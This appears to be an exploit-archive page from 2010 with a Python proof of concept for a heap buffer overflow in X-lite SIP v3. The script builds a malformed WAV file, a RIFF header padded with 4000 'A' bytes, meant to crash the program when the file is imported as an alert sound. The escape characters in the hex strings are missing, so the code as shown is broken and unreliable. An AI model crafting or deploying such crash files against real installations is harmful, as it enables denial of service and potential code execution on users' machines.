X-lite SIP v3 (wav) memory corruption Heap BOF exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : X-lite SIP v3 (wav) memory corruption Heap BOF exploit
# Published : 2010-02-06
# Author : TecR0c
# Previous Title : SQLite Browser v2.0b1 Local DoS Vulnerability
# Next Title : Opera 10.10 Remote Code Execution DoS Exploit

#!/usr/bin/python
# 
# ####################################################################
#
# X-lite SIP v3 (wav) memory corruption Heap BOF exploit
# Date: 06-02-2010
# Author: TecR0c
# Software Link: http://xlite.counterpath.com/download/win32_100106
# Version: 3.0
# Tested on:  Windows XP SP3
# Usage: right click running application > options > Alerts & sounds > import --> boom!
#
######################################################################

header = ("x52x49x46x46xe4x0ax09x00x57x41x56x45x66x6dx74x20"
"x10x00x00x00x01x00x02x00x44xacx00x00x10xb1x02x00"
"x04x00x10x00x64x61x74x61xc0x0ax09x00x01x00x01x00"
"x00x00x01x00x01x00x04x00x00x00x05x00x02x00x08x00"
"x02x00x09x00x01x00x0a")

exploit = header
exploit += "x41" * 4000

try:
	print "[+] Creating exploit file.."
	crash = open('TecR0c-wins.wav','w');
	crash.write(exploit);
	crash.close();
except:
	print "[-] Error: You do not have correct permissions.."